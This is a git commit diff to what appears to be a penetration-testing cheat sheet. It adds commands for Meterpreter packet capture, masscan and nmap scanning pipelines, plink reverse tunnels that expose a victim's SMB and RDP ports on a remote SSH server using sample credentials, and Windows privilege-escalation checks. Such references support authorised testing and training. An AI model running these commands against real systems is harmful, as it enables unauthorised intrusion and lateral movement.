Network Discovery - Masscan update

This commit is contained in:
Swissky 2019-08-29 01:08:26 +02:00
parent 6c161f26b2
commit bb305d0183
24 changed files with 36 additions and 5 deletions

View file

@ -10,6 +10,7 @@
* [Meterpreter Webdelivery](#meterpreter-webdelivery)
* [Get System](#get-system)
* [Persistence Startup](#persistence-startup)
* [Network Monitoring](#network-monitoring)
* [Portforward](#portforward)
* [Upload / Download](#upload---download)
* [Execute from Memory](#execute-from-memory)
@ -130,6 +131,16 @@ OPTIONS:
meterpreter > run persistence -U -p 4242
### Network Monitoring
# list interfaces
run packetrecorder -li
# record interface n°1
run packetrecorder -i 1
### Portforward

View file

@ -103,8 +103,21 @@ List Nmap scripts : ls /usr/share/nmap/scripts/
masscan -iL ips-online.txt --rate 10000 -p1-65535 --only-open -oL masscan.out
masscan -e tun0 -p1-65535,U:1-65535 --rate 1000
masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
# find machines on the network
sudo masscan --rate 500 --interface tap0 --router-ip $ROUTER_IP --top-ports 100 $NETWORK -oL masscan_machines.tmp
cat masscan_machines.tmp | grep open | cut -d " " -f4 | sort -u > masscan_machines.lst
# find open ports for one machine
sudo masscan --rate 1000 --interface tap0 --router-ip $ROUTER_IP -p1-65535,U:1-65535 $MACHINE_IP --banners -oL $MACHINE_IP/scans/masscan-ports.lst
# TCP grab banners and services informations
TCP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep tcp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
[ "$TCP_PORTS" ] && sudo nmap -sT -sC -sV -v -Pn -n -T4 -p$TCP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_tcp $MACHINE_IP
# UDP grab banners and services informations
UDP_PORTS=$(cat $MACHINE_IP/scans/masscan-ports.lst| grep open | grep udp | cut -d " " -f3 | tr '\n' ',' | head -c -1)
[ "$UDP_PORTS" ] && sudo nmap -sU -sC -sV -v -Pn -n -T4 -p$UDP_PORTS --reason --version-intensity=5 -oA $MACHINE_IP/scans/nmap_udp $MACHINE_IP
## Reconnoitre

View file

@ -195,10 +195,17 @@ python --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [pro
## plink
plink -l root -pw toor ssh-server-ip -R 3390: --> exposes the RDP port of the machine in the port 3390 of the SSH Server
# exposes the SMB port of the machine in the port 445 of the SSH Server
plink -l root -pw toor -R 445:
# exposes the RDP port of the machine in the port 3390 of the SSH Server
plink -l root -pw toor ssh-server-ip -R 3390:
plink -l root -pw mypassword -R
plink.exe -v -pw mypassword user@ -L 6666:
plink -R [Port to forward to on your VPS]:localhost:[Port to forward on your local machine] [VPS IP]
# redirects the Windows port 445 to Kali on port 22
plink -P 22 -l root -pw some_password -C -R 445:
## ngrok

View file

@ -490,7 +490,8 @@ net start upnphost
sc config upnphost depend=""
Using [`accesschk`]( from Sysinternals.
Using [`accesschk`]( from Sysinternals or [accesschk-XP.exe -](
$ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
@ -588,7 +589,6 @@ Check if these registry values are set to "1".
$ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
$ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated